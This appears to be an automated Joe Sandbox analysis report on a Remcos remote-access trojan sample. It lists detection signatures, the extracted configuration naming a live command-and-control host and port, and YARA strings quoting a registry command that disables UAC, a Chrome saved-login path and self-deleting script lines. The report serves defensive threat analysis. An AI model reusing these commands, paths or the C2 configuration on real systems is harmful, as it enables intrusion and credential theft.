Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe

Overview

General Information

Sample name:17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe
Analysis ID:1586001
MD5:fa48843ce9a50a4bc84f6996923b7a27
SHA1:29df9451a5aae33ddca11c26163d1c276bf2ca65
SHA256:311df69d6714a0736be9908da11fa4c544a542ba4f9c99a314e727b321a80cd7
Tags:base64-decodedexeuser-abuse_ch
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Deletes itself after installation
Installs a global keyboard hook
Machine Learning detection for sample
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Sample file is different than original file name gathered from version info
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w10x64
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": ["luiscaseres.gleeze.com:1997:1"], "Assigned name": "19-12-24", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-IUHLZ9", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
    17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeJoeSecurity_RemcosYara detected Remcos RATJoe Security
      17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
        17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeWindows_Trojan_Remcos_b296e965unknownunknown
        • 0x6aaf8:$a1: Remcos restarted by watchdog!
        • 0x6b070:$a3: %02i:%02i:%02i:%03i
        17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeREMCOS_RAT_variantsunknownunknown
        • 0x64d94:$str_a1: C:\Windows\System32\cmd.exe
        • 0x64d10:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
        • 0x64d10:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
        • 0x65210:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
        • 0x65810:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
        • 0x64e04:$str_b2: Executing file:
        • 0x65c3c:$str_b3: GetDirectListeningPort
        • 0x65600:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
        • 0x65780:$str_b7: \update.vbs
        • 0x64e2c:$str_b9: Downloaded file:
        • 0x64e18:$str_b10: Downloading file:
        • 0x64ebc:$str_b12: Failed to upload file:
        • 0x65c04:$str_b13: StartForward
        • 0x65c24:$str_b14: StopForward
        • 0x656d8:$str_b15: fso.DeleteFile "
        • 0x6566c:$str_b16: On Error Resume Next
        • 0x65708:$str_b17: fso.DeleteFolder "
        • 0x64eac:$str_b18: Uploaded file:
        • 0x64e6c:$str_b19: Unable to delete:
        • 0x656a0:$str_b20: while fso.FileExists("
        • 0x65349:$str_c0: [Firefox StoredLogins not found]
        Click to see the 1 entries

        Dropped Files

        SourceRuleDescriptionAuthorStrings
        C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security

          Memory Dumps

          SourceRuleDescriptionAuthorStrings
          00000000.00000000.1409380957.0000000000457000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
            00000000.00000000.1409380957.0000000000457000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
              00000000.00000000.1409380957.0000000000457000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                00000000.00000000.1409380957.0000000000457000.00000002.00000001.01000000.00000003.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
                • 0x146f8:$a1: Remcos restarted by watchdog!
                • 0x14c70:$a3: %02i:%02i:%02i:%03i
                00000000.00000002.3307627880.000000000224F000.00000004.00000010.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
                  Click to see the 9 entries

                  Unpacked PEs

                  SourceRuleDescriptionAuthorStrings
                  0.0.17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe.400000.0.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                    0.0.17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe.400000.0.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                      0.0.17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe.400000.0.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                        0.0.17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe.400000.0.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                        • 0x6aaf8:$a1: Remcos restarted by watchdog!
                        • 0x6b070:$a3: %02i:%02i:%02i:%03i
                        0.0.17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe.400000.0.unpackREMCOS_RAT_variantsunknownunknown
                        • 0x64d94:$str_a1: C:\Windows\System32\cmd.exe
                        • 0x64d10:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                        • 0x64d10:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                        • 0x65210:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                        • 0x65810:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                        • 0x64e04:$str_b2: Executing file:
                        • 0x65c3c:$str_b3: GetDirectListeningPort
                        • 0x65600:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                        • 0x65780:$str_b7: \update.vbs
                        • 0x64e2c:$str_b9: Downloaded file:
                        • 0x64e18:$str_b10: Downloading file:
                        • 0x64ebc:$str_b12: Failed to upload file:
                        • 0x65c04:$str_b13: StartForward
                        • 0x65c24:$str_b14: StopForward
                        • 0x656d8:$str_b15: fso.DeleteFile "
                        • 0x6566c:$str_b16: On Error Resume Next
                        • 0x65708:$str_b17: fso.DeleteFolder "
                        • 0x64eac:$str_b18: Uploaded file:
                        • 0x64e6c:$str_b19: Unable to delete:
                        • 0x656a0:$str_b20: while fso.FileExists("
                        • 0x65349:$str_c0: [Firefox StoredLogins not found]
                        Click to see the 7 entries

                        Sigma Signatures

                        System Summary

                        barindex
                        Sigma detected: Script Interpreter Execution From Suspicious Folder
                        Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\bmdbmsbytqzebij.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\bmdbmsbytqzebij.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe", ParentImage: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe, ParentProcessId: 7784, ParentProcessName: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\bmdbmsbytqzebij.vbs" , ProcessId: 4444, ProcessName: wscript.exe
                        Sigma detected: Suspicious Script Execution From Temp Folder
                        Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\bmdbmsbytqzebij.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\bmdbmsbytqzebij.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe", ParentImage: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe, ParentProcessId: 7784, ParentProcessName: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\bmdbmsbytqzebij.vbs" , ProcessId: 4444, ProcessName: wscript.exe
                        Sigma detected: WScript or CScript Dropper
                        Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\bmdbmsbytqzebij.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\bmdbmsbytqzebij.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe", ParentImage: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe, ParentProcessId: 7784, ParentProcessName: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\bmdbmsbytqzebij.vbs" , ProcessId: 4444, ProcessName: wscript.exe
                        Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                        Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\bmdbmsbytqzebij.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\bmdbmsbytqzebij.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe", ParentImage: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe, ParentProcessId: 7784, ParentProcessName: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\bmdbmsbytqzebij.vbs" , ProcessId: 4444, ProcessName: wscript.exe

                        Stealing of Sensitive Information

                        barindex
                        Sigma detected: Remcos
                        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe, ProcessId: 7784, TargetFilename: C:\ProgramData\remcos\logs.dat

                        Suricata Signatures

                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2025-01-08T16:00:33.207020+010020365941Malware Command and Control Activity Detected192.168.2.849705179.15.136.61997TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2025-01-08T16:00:35.337900+010028033043Unknown Traffic192.168.2.849706178.237.33.5080TCP

                        Joe Sandbox Signatures

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Antivirus / Scanner detection for submitted sample
                        Source: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeAvira: detected
                        Antivirus detection for URL or domain
                        Source: luiscaseres.gleeze.comAvira URL Cloud: Label: malware
                        Found malware configuration
                        Source: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeMalware Configuration Extractor: Remcos {"Host:Port:Password": ["luiscaseres.gleeze.com:1997:1"], "Assigned name": "19-12-24", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-IUHLZ9", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
                        Multi AV Scanner detection for submitted file
                        Source: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeReversingLabs: Detection: 71%
                        Yara detected Remcos RAT
                        Source: Yara matchFile source: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe, type: SAMPLE
                        Source: Yara matchFile source: 0.0.17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000000.1409380957.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.3307627880.000000000224F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.3307385684.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe PID: 7784, type: MEMORYSTR
                        Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                        AI detected suspicious sample
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                        Machine Learning detection for sample
                        Source: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: 0_2_0043294A CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,0_2_0043294A
                        Source: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe, 00000000.00000000.1409380957.0000000000457000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_f4b8614d-f

                        Exploits

                        barindex
                        Yara detected UAC Bypass using CMSTP
                        Source: Yara matchFile source: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe, type: SAMPLE
                        Source: Yara matchFile source: 0.0.17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000000.1409380957.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe PID: 7784, type: MEMORYSTR

                        Privilege Escalation

                        barindex
                        Contains functionality to bypass UAC (CMSTPLUA)
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: 0_2_00406764 _wcslen,CoGetObject,0_2_00406764
                        Source: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: 0_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,0_2_0040B335
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: 0_2_0041B43F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,0_2_0041B43F
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: 0_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,0_2_0040B53A
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: 0_2_0044D5F9 FindFirstFileExA,0_2_0044D5F9
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: 0_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,0_2_004089A9
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: 0_2_00406AC2 FindFirstFileW,FindNextFileW,0_2_00406AC2
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: 0_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,0_2_00407A8C
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: 0_2_00418C79 FindFirstFileW,FindNextFileW,FindNextFileW,0_2_00418C79
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: 0_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,0_2_00408DA7
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: 0_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,0_2_00406F06

                        Networking

                        barindex
                        Suricata IDS alerts for network traffic
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.8:49705 -> 179.15.136.6:1997
                        C2 URLs / IPs found in malware configuration
                        Source: Malware configuration extractorURLs: luiscaseres.gleeze.com
                        Source: global trafficTCP traffic: 192.168.2.8:49705 -> 179.15.136.6:1997
                        Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                        Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                        Source: Joe Sandbox ViewASN Name: ColombiaMovilCO ColombiaMovilCO
                        Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.8:49706 -> 178.237.33.50:80
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: 0_2_00426107 recv,0_2_00426107
                        Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                        Source: global trafficDNS traffic detected: DNS query: luiscaseres.gleeze.com
                        Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                        Source: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe, 00000000.00000003.1439769531.0000000000801000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
                        Source: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeString found in binary or memory: http://geoplugin.net/json.gp/C
                        Source: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe, 00000000.00000003.1439769531.0000000000801000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpj

                        Key, Mouse, Clipboard, Microphone and Screen Capturing

                        barindex
                        Contains functionality to register a low level keyboard hook
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: 0_2_004099E4 SetWindowsHookExA 0000000D,004099D0,000000000_2_004099E4
                        Installs a global keyboard hook
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeJump to behavior
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: 0_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,0_2_004159C6
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: 0_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,0_2_004159C6
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: 0_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,0_2_004159C6
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: 0_2_00409B10 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,0_2_00409B10
                        Source: Yara matchFile source: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe, type: SAMPLE
                        Source: Yara matchFile source: 0.0.17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000000.1409380957.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe PID: 7784, type: MEMORYSTR

                        E-Banking Fraud

                        barindex
                        Yara detected Remcos RAT
